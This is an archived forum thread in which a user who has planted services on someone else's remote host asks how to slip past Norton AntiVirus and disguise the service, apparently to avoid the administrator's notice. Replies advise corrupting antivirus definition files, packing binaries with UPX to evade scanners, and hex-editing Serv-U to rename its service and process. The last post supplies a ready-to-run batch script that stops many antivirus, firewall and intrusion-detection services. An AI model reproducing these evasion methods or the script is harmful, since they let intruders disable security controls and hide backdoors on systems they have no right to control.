=k3Rn=
Oct 3 2003, 03:42 AM
hey i installed some windows services on a remote host, using firedaemon. first i wonderd why i couldn't upload firedaemon.exe, it got deleted right away. then i found norton antivirus auto protect running, i shut down the service and then i could upload the file. so it seems like nav deletes firedaemon.exe right away. i wonder why my nav 2003 doesn't alert for firedaemon.exe on my hd. maybe someone can tell me that. second, i now want to bypass that detection by nav. is there a possibility to modfy the file, so that i doesn't get detected? is it right that the file has to have the filename firedaemon.exe? when i tryed to rename it to something else, i couldn't start services with it anymore. some explanaition is needed  i hope someone can give me some support on that problem. thx in advance for all your replies. greets =k3Rn=
thatsmej
Oct 3 2003, 09:58 AM
search this forum for an virus & firewall killer, and then you can run that file.. or you can create an exclusion dir and put your files in there... think it`s an reg key.. but install that virus scanner local and you`ll find the key 
=k3Rn=
Oct 3 2003, 07:34 PM
so, i don't want to kill the anti virus program, the admin will notice that.
i also had that exclusion dir in mind, but thats also quite obviouse to track back.
there must be anotehr way to bypass the scanner / the detection.
i read something about hex editing exe files - but i don't have any further info on that. i need help on that.
You can mod the definition files for NAV just edit the file screw with the code .. alot of the time NAV wont scan cause it cant read the definitions (after box is rebooted) and will opnly update new because it thinks it has it .pain to get it to work proper without errors but works great once yah got it
=k3Rn=
Oct 4 2003, 04:25 PM
hm can't you do it from the other side? like modifing the exe file?!
i even don't understand why you can't even rename the file.
Johny
Oct 5 2003, 06:36 AM
why using firedaemon anyway ? just use the actually Nt install service and you'll have no probs with the right tools and knowledge it can do the same as firedaemon + it's an extra file less
=k3Rn=
Oct 5 2003, 05:45 PM
could you share your knowleadge about that please?
i am very intrested in better ways to set up a service.
it's true that firedaemon isn't that noce to use, it appears in process list as firedaemon service and i don't even know how to change that appearance.
i read that you can modify some exe files like the servudaemon.exe so that they display different service names and processes. i would be glad if someone could tell me a litte more about that, i don't know exactly how to do that.
metrox
Oct 5 2003, 07:22 PM
haha, you are a hacker ? some help about different thinks, k, technical help k, but a exact tutorial to do a little bit better hacking. no. sorry. but your are a hacker, or? you must test, develop, and many more. i think the information are enough. I have myself so much time with hacking employ. sorry that my opion. 
=k3Rn=
Oct 5 2003, 10:23 PM
next time you can keep your opinion for yourself. i tryed to form a specific question on how to bypass the detection and howto modify the exe file so that it has a different name in process list. i am still waiting for some "friendly" guys helping me in that. so shut up. (my opinion)
mighty_falcon
Apr 27 2004, 12:57 AM
guess its a bit late but for those wondering how to change the service name etc get yourself a hexteditor , i prefer hexeditor workshop, but others may disagree on this... search through it (using ascii text) and find the following names and then replace them names identical in length to the orginal names! libeay32.dll >> ServUDaemon.exe >>> ServUDaemon.ini >>> [Service name] Serv-U FTP Server >>> [Service Identifier] Serv-U >>> you may also want to change the app description and also the names of the files produced when you run servu, like serustartuplog... mighty
s3mtexx
Apr 27 2004, 08:43 AM
| QUOTE (mighty_falcon @ Apr 27 2004, 12:57 AM) | guess its a bit late but for those wondering how to change the service name etc
get yourself a hexteditor , i prefer hexeditor workshop, but others may disagree on this...
search through it (using ascii text) and find the following names and then replace them names identical in length to the orginal names!
libeay32.dll >>
ServUDaemon.exe >>>
ServUDaemon.ini >>>
[Service name] Serv-U FTP Server >>>
[Service Identifier] Serv-U >>>
you may also want to change the app description and also the names of the files produced when you run servu, like serustartuplog...
mighty |
thnx  that hex editor could be handy 
Stephen79
Apr 27 2004, 08:53 AM
UPX and UPXRdir are a quick and often effective way to compress and confuse an antivirus sytem. UPXYou can install a service from a command line, add it to the registry or use a 3rd party tool. I like this one myself: C:\>serv XNET 1.04 Usage : XNET <Start | Stop | Pause | Continue | List | Install | Remove | Modify | Reboot | Shutdown | Help>
DumpZ
Apr 27 2004, 09:03 AM
Well UPXing a binary often doesnt work.
@s3mtexx
libeay32.dll is that dll needed? because i only use servudaemon.exe and servudaemon.ini (hex edited) and i never had any problems
Meads
Apr 27 2004, 10:53 AM
Use the windows NT service installer cd to the dir and type ServUDaemon.exe /i then netstart serv-u to start it 
enemc
Apr 27 2004, 11:51 AM
hi, i run trend micro pc-cillin (also antivir software) om my machine, you can enable and disable the real time scanning status, maybe you should just disable realtime scanning on that certain antivirus application so you can upload. i've never had that much success with renaming or packing with upx. 
Silent Bob
Apr 27 2004, 02:03 PM
theres another prog floating about that changes the header once you pack with upx
so that AV doesnt find it, maybe its worth doing a search for that, i saw it recently
mighty_falcon
Apr 27 2004, 11:37 PM
| QUOTE (DumpZ @ Apr 27 2004, 09:03 AM) | Well UPXing a binary often doesnt work.
@s3mtexx
libeay32.dll is that dll needed? because i only use servudaemon.exe and servudaemon.ini (hex edited) and i never had any problems |
not really m8, the dll file is only needed if you plan to have an ssl connection....
MAR1LYN-MAN50N
Feb 21 2005, 09:47 PM
hey m8s im modding an serv-u and it really w0rk, but when i start the serv-u he create a file called ServUStartUpLog.txt and i want turn off this log, someone know own to do that?
nicolas9510
Feb 21 2005, 09:50 PM
hmmm
read the rules
no SERV-U posts
tibbar
Feb 21 2005, 10:15 PM
another one for the trash can...
MAR1LYN-MAN50N
Feb 21 2005, 11:37 PM
sorry about servu xit :x
OscarHS
Feb 23 2005, 05:17 AM
QUOTE REM echo Note: Code by G36K
REM echo ---------------------------------------------------
REM @echo off
net stop _Avp32.exe /y
net stop _Avpcc.exe /y
net stop _Avpm.exe /y
net stop Ackwin32.exe /y
net stop Agnitum Outpost Firewall /y
net stop Anti-Trojan.exe /y
net stop ANTIVIR /y
net stop Apvxdwin.exe /y
net stop ATRACK /y
net stop Autodown.exe /y
net stop AVCONSOL /y
net stop Avconsol.exe /y
net stop Ave32.exe /y
net stop Avgctrl.exe /y
net stop Avkserv.exe /y
net stop Avnt.exe /y
net stop Avp.exe /y
net stop AVP.EXE /y
net stop AVP32 /y
net stop Avp32.exe /y
net stop Avpcc.exe /y
net stop Avpdos32.exe /y
net stop Avpm.exe /y
net stop Avptc32.exe /y
net stop Avpupd.exe /y
net stop Avsched32.exe /y
net stop AVSync Manager /y
net stop AVSYNMGR /y
net stop AVGUARD.exe /y
net stop AVGNT.exe /y
net stop Avwin.exe /y
net stop Avwin95.exe /y
net stop Avwupd32.exe /y
net stop Blackd.exe /y
net stop BLACKICE /y
net stop BlackICE Defender /y
net stop Blackice.exe /y
net stop CA Sessionwall-3 /y
net stop Cfiadmin.exe /y
net stop Cfiaudit.exe /y
net stop CFINET /y
net stop Cfinet.exe /y
net stop CFINET32 /y
net stop Cfinet32.exe /y
net stop Claw95.exe /y
net stop Claw95cf.exe /y
net stop Cleaner.exe /y
net stop Cleaner3.exe /y
net stop ConSeal PC Firewall & Private Desktop /y
net stop Defwatch /y
net stop Defwatch.exe /y
net stop Dvp95.exe /y
net stop Dvp95_0.exe /y
net stop Ecengine.exe /y
net stop eSafe Protect Desktop /y
net stop Esafe.exe /y
net stop Espwatch.exe /y
net stop eTrust EZ Firewall /y
net stop F-Agnt95.exe /y
net stop Findviru.exe /y
net stop Fprot.exe /y
net stop F-Prot.exe /y
net stop F-PROT95 /y
net stop F-Prot95.exe /y
net stop FP-WIN /y
net stop Fp-Win.exe /y
net stop Freedom 2 /y
net stop Frw.exe /y
net stop F-STOPW /y
net stop F-Stopw.exe /y
net stop GNAT Box Lite /y
net stop IAMAPP /y
net stop Iamapp.exe /y
net stop Iamserv.exe /y
net stop Ibmasn.exe /y
net stop Ibmavsp.exe /y
net stop Icload95.exe /y
net stop Icloadnt.exe /y
net stop ICMON /y
net stop Icmon.exe /y
net stop Icsupp95.exe /y
net stop Icsuppnt.exe /y
net stop Iface.exe /y
net stop Internet Alert 99 /y
net stop IOMON98 /y
net stop Iomon98.exe /y
net stop Jedi.exe /y
net stop LOCKDOWN2000 /y
net stop Lockdown2000.exe /y
net stop Look'n'Stop /y
net stop Look'n'Stop Lite /y
net stop Lookout.exe /y
net stop LUALL /y
net stop Luall.exe /y
net stop LUCOMSERVER /y
net stop MCAFEE /y
net stop McAfee Firewall /y
net stop McAfee Internet Guard Dog Pro /y
net stop Moolive.exe /y
net stop Mpftray.exe /y
net stop N32scanw.exe /y
net stop NAVAPSVC /y
net stop NAVAPW32 /y
net stop Navapw32.exe /y
net stop NAVLU32 /y
net stop Navlu32.exe /y
net stop Navnt.exe /y
net stop NAVRUNR /y
net stop NAVW32 /y
net stop Navw32.exe /y
net stop NAVWNT /y
net stop Navwnt.exe /y
net stop NeoWatch /y
net stop NISSERV /y
net stop NISUM /y
net stop Nisum.exe /y
net stop NMAIN /y
net stop Nmain.exe /y
net stop Norman Personal Firewall /y
net stop Normist.exe /y
net stop NORTON /y
net stop Norton AntiVirus Server /y
net stop Norton Internet Security /y
net stop Norton Personal Firewall 2001 /y
net stop Norton Personal Firewall 2002 /y
net stop Norton Personal Firewall 2003 /y
net stop Norton Personal Firewall 2004 /y
net stop Nupgrade.exe /y
net stop NVC95 /y
net stop Nvc95.exe /y
net stop Outpost.exe /y
net stop Padmin.exe /y
net stop Pavcl.exe /y
net stop Pavsched.exe /y
net stop Pavw.exe /y
net stop Pc firewall /y
net stop PC Viper /y
net stop PCCIOMON /y
net stop PCCMAIN /y
net stop PCCWIN98 /y
net stop Pccwin98.exe /y
net stop Pcfwallicon.exe /y
net stop Persfw.exe /y
net stop PGP Gauntlet /y
net stop POP3TRAP /y
net stop Proxy + /y
net stop PVIEW95 /y
net stop Rav7.exe /y
net stop Rav7win.exe /y
net stop Rescue.exe /y
net stop RESCUE32 /y
net stop SAFEWEB /y
net stop Safeweb.exe /y
net stop Scan32.exe /y
net stop Scan95.exe /y
net stop Scanpm.exe /y
net stop Scrscan.exe /y
net stop Serv95.exe /y
net stop Smc.exe /y
net stop SMCSERVICE /y
net stop Snort - Win32 GUI /y
net stop Snort (Intrusion Detection System) /y
net stop Sphinx.exe /y
net stop Sphinxwall /y
net stop Sweep95.exe /y
net stop Sybergen Secure Desktop /y
net stop Sybergen SyGate /y
net stop SYMPROXYSVC /y
net stop Tbscan.exe /y
net stop Tca.exe /y
net stop Tds2-98.exe /y
net stop Tds2-Nt.exe /y
net stop TermiNET /y
net stop TGB:BOB /y
net stop Tiny Personal Firewall /y
net stop Vet95.exe /y
net stop Vettray.exe /y
net stop Vscan40.exe /y
net stop Vsecomr.exe /y
net stop VSHWIN32 /y
net stop Vshwin32.exe /y
net stop VSSTAT /y
net stop Vsstat.exe /y
net stop vbshield.exe /y
net stop WEBSCANX /y
net stop Webscanx.exe /y
net stop WEBTRAP /y
net stop Wfindv32.exe /y
net stop Wingate /y
net stop WinProxy /y
net stop WinRoute /y
net stop WyvernWorks Firewall /y
net stop Zonealarm /y
net stop Zonealarm.exe /y
net stop AVP32 /y
net stop LOCKDOWN2000 /y
net stop AVP.EXE /y
net stop CFINET32 /y
net stop CFINET /y
net stop ICMON /y
net stop SAFEWEB /y
net stop WEBSCANX /y
net stop ANTIVIR /y
net stop MCAFEE /y
net stop NORTON /y
net stop NVC95 /y
net stop FP-WIN /y
net stop IOMON98 /y
net stop PCCWIN98 /y
net stop F-PROT95 /y
net stop F-STOPW /y
net stop PVIEW95 /y
net stop NAVWNT /y
net stop NAVRUNR /y
net stop NAVLU32 /y
net stop NAVAPSVC /y
net stop NISUM /y
net stop SYMPROXYSVC /y
net stop RESCUE32 /y
net stop NISSERV /y
net stop ATRACK /y
net stop IAMAPP /y
net stop LUCOMSERVER /y
net stop LUALL /y
net stop NMAIN /y
net stop NAVW32 /y
net stop NAVAPW32 /y
net stop VSSTAT /y
net stop VSHWIN32 /y
net stop AVSYNMGR /y
net stop AVCONSOL /y
net stop WEBTRAP /y
net stop POP3TRAP /y
net stop PCCMAIN /y
net stop PCCIOMON /y
net stop Antivirsecure /y
net stop Mcafeeframework /y
net stop Mcshield /y
net stop MCtaskmanager /y
REM del c:\*ANTI-VIR*.DAT /s
REM del c:\*CHKLIST*.DAT /s
REM del c:\*CHKLIST*.MS /s
REM del c:\*CHKLIST*.CPS /s
REM del c:\*CHKLIST*.TAV /s
REM del c:\*IVB*.NTZ /s
REM del c:\*SMARTCHK*.MS /s
REM del c:\*SMARTCHK*.CPS /s
REM del c:\*AVGQT*.DAT /s
REM del c:\*AGUARD*.DAT /s
REM echo on
REM echo Anti-Viren & Firewall Programme deaktiviert!!!.
echo done try adding all that to a .bat file and executing it :-) njoy hope it works
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
